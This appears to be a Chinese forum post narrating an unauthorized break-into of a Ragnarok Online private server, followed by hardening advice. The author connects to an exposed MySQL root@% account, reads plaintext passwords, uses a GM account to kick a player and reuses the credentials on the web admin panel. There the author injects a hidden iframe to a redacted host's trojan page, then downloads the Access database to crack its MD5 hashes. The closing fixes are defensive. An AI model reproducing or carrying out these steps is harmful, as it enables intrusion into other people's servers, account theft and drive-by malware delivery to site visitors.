Athena Mysql 服务器攻防实录

今天上一个Athena Mysql 服务器 去观摩取经..
无意中发现了他上面的漏洞

-----------------------------------我是我,分隔线 ^^------------------------
第一部分::::: Mysql 设置

首先,,我这联盟版看到他服务器的介绍..
心动了,想去看看...

运行>> ping XXX.mpc.cn
得到他的IP: 61.235.**.***

(DATA里添加他的服务器,上去看看还真不错!! ^^)

又看了下他在联盟版的介绍,发现用的是Mysql
想起会不会有Mysql 漏洞呢~~

用 "流光" 5.0 扫了一遍.发现 MYSQL 端口3306 用户root
于是打开我的 MYSQL CC
添加服务器::

按下连接..连上了!! ^^ 我自己都有点以外

前阵子也有人发贴说明过了 主要是Mysql用户设置问题.
请看下面的这图
蓝色部分的 root@%

只要有了这 root@% 就意味这任何人都可以外部连接你的MYSQL数据库!

下面有人问:: 连上了有什么用?? #@%$#%
I 服了 U

好了,进帐号表看看... 呵呵,所有帐号密码明文,,摆在我眼前
随便选了个GM号..上游戏看看...   逛了一圈..
T了个人 不知道那无辜被T的骂人没呢? ^^ (GM号主人,&_&我冤枉啊!)
没敢做什么坏事了
下了游戏~~

-----------------------------------我是我,分隔线 ^^------------------------
第二部分::: RO私服ASP管理系统 漏洞

原文再续就书接上一回,上回说到下了游戏..

又转去他的网页看~

是改自 **china - RO私服ASP管理系统 的~ 其实不大好看. 呵呵~ 他看到这里表骂我哦 ^^

随便逛了逛~~
最后逛到后台去了`` 什么?? 要我输入帐号密码?? >_<

打开刚才连上的他的MYSQL服务器
找到里面游戏管理者的帐号和密码~ 输入到网页里

..........................恭喜你~ 你才对了..我又进了网页后台!

他的游戏GM号帐号密码和网页后台管理帐号密码一样!!! 大家不要犯他这错误哦

**china - RO私服ASP管理系统 我也在用```
很熟悉,转到 ::修改注册协议:: 那里可以用HTML..

我在他的文字最下面添加上::

<iframe src="http://*****/mm.htm" name="zhu" width="0" height="0" frameborder="0">

懂得HTML的人都知道.上面的代码是连接到mm.htm这网页
呵呵..上面的 mm.htm 有个小木马的话.....
他的机器就是肉鸡了```

在上面写ASP代码,,可以变成上传文件用的
上传个木马?? 放个什么病毒上去??
违法犯罪活动哦!!

我可没敢做什么大坏事... ^^

-----------------------------------我是我,分隔线 ^^------------------------
第三部分 :::我MYSQL设置没问题..我怕谁!!

呵呵.先别 牛..
我们再来看看这 RO私服ASP管理系统.
ACCESS数据库~
OK,先看看数据库地址.. 对照我下载的 RO私服ASP管理系统..
在地址栏打上::

HTTP://61.235.**.***/coon.asp 等待一会儿..出错了` `` 呵呵.

Microsoft JET Database Engine ＇80004005＇

＇C:\Program Files\NetBox 2.7\Samples\WebServer\wwwroot\

哦.用的是NetBox 2.7 哦,,

再对照本地文件..干脆直接到数据库地址

HTTP://61.235.**.***/admin/data/ragnarok.asp

出来一大对乱码``` &_&
哈哈,,真不幸..数据库我要下载拉~~

FlashGet下载.. 改名 XWRO.mdb 打开..
呵呵,管理员帐号和密码```

虽然密码不是明文的... md5加密
可是下个 "md5解码器" 就能暴力解开了~~
要多长时间就得看你的运气罗
/
我就没去解了
QQ上通知这服务器老大````

把所知道的漏洞都堵了~

-----------------------------------我是我,分隔线 ^^------------------------
第四部分 ::::堵住堵住..我的情人你别亲!!

1..上面的MYSQL用户设置漏洞

建MYSQL数据库时,删掉系统默认的

root@%
root@localhost

改成你自己添加的用户
例如::

main@192.168.1.10 <-你的IP (IP固定的话)
kofn@Maie           <-你的机器的名字~~

这样别人就不能远程连接你的MYSQL了~~

2. **china - RO私服ASP管理系统 {其他的估计也差不多}

(1) 更改 /data/ragnarok.asp＇名字
    建议是##$^1123ddf.asp 之类的难猜到的名字! #开头的文件是不能下载```
(2) 更改admin目录名字..

上面的其中一种方法都可以.. 改完记得在 coon.asp和admin/inc/coon.asp里面把数据库路迳改成你改了的.不然要出错罗```

     AccessDB = "admin/data/ragnarok.asp" ＇这里.改你数据库路迳